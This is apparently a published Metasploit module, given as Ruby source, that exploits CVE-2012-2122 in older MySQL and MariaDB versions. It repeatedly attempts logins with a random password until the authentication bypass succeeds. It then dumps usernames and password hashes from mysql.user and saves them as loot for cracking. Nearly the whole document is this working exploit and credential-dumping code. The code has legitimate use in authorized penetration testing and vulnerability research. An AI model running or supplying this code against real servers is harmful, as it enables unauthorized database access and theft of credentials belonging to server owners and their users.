Headline
MySQL Authentication Bypass Password Dump
This Metasploit module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking. Impacts MySQL versions: - 5.1.x before 5.1.63 - 5.5.x before 5.5.24 - 5.6.x before 5.6.6 And MariaDB versions: - 5.1.x before 5.1.62 - 5.2.x before 5.2.12 - 5.3.x before 5.3.6 - 5.5.x before 5.5.23.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/mysql/client'class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'MySQL Authentication Bypass Password Dump', 'Description' => %Q{ This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking. Impacts MySQL versions: - 5.1.x before 5.1.63 - 5.5.x before 5.5.24 - 5.6.x before 5.6.6 And MariaDB versions: - 5.1.x before 5.1.62 - 5.2.x before 5.2.12 - 5.3.x before 5.3.6 - 5.5.x before 5.5.23 }, 'Author' => [ 'theLightCosine', # Original hashdump module 'jcran' # Authentication bypass bruteforce implementation ], 'References' => [ ['CVE', '2012-2122'], ['OSVDB', '82804'], ['URL', 'https://www.rapid7.com/blog/post/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/'] ], 'DisclosureDate' => 'Jun 09 2012', 'License' => MSF_LICENSE ) deregister_options('PASSWORD') register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) ]) end def run_host(ip) # Keep track of results (successful connections) results = [] # Username and password placeholders username = datastore['USERNAME'] password = Rex::Text.rand_text_alpha(rand(8)+1) # Do an initial check to see if we can log into the server at all begin socket = connect(false) close_required = true mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket) results << mysql_client close_required = false print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}" rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)" return rescue ::Rex::Proto::MySQL::Client::AccessDeniedError print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test" rescue ::Interrupt raise $! rescue ::Exception => e print_error "#{rhost}:#{rport} Error: #{e}" return ensure socket.close if socket && close_required end # Short circuit if we already won if results.length > 0 self.mysql_conn = results.first return dump_hashes(mysql_client.peerhost, mysql_client.peerport) end # # Threaded login checker # max_threads = 16 cur_threads = [] # Try up to 1000 times just to be sure queue = [*(1 .. 1000)] while(queue.length > 0) while(cur_threads.length < max_threads) # We can stop if we get a valid login break if results.length > 0 # keep track of how many attempts we've made item = queue.shift # We can stop if we reach 1000 tries break if not item # Status indicator print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0 t = Thread.new(item) do |count| begin # Create our socket and make the connection close_required = true s = connect(false) mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s) print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}" results << mysql_client close_required = false rescue ::Rex::Proto::MySQL::Client::AccessDeniedError rescue ::Exception => e print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}" ensure s.close if socket && close_required end end cur_threads << t end # We can stop if we get a valid login break if results.length > 0 # Add to a list of dead threads if we're finished cur_threads.each_index do |ti| t = cur_threads[ti] if not t.alive? cur_threads[ti] = nil end end # Remove any dead threads from the set cur_threads.delete(nil) ::IO.select(nil, nil, nil, 0.25) end # Clean up any remaining threads cur_threads.each {|x| x.kill } if results.length > 0 print_good("#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes...") self.mysql_conn = results.first return dump_hashes(mysql_client.peerhost, mysql_client.peerport) end print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") end def dump_hashes(host, port) # Grabs the username and password hashes and stores them as loot res = mysql_query("SELECT user,password from mysql.user") if res.nil? print_error("#{host}:#{port} There was an error reading the MySQL User Table") return end # Create a table to store data tbl = Rex::Text::Table.new( 'Header' => 'MysQL Server Hashes', 'Indent' => 1, 'Columns' => ['Username', 'Hash'] ) if res.size > 0 res.each do |row| next unless (row[0].to_s + row[1].to_s).length > 0 tbl << [row[0], row[1]] print_good("#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}") end end this_service = nil if framework.db and framework.db.active this_service = report_service( :host => host, :port => port, :name => 'mysql', :proto => 'tcp' ) end report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty? end # Stores the Hash Table as Loot for Later Cracking def report_hashes(hash_loot,service, host, port) filename= "#{host}-#{port}_mysqlhashes.txt" path = store_loot("mysql.hashes", "text/plain", host, hash_loot, filename, "MySQL Hashes", service) print_good("#{host}:#{port} Hash Table has been saved: #{path}") endend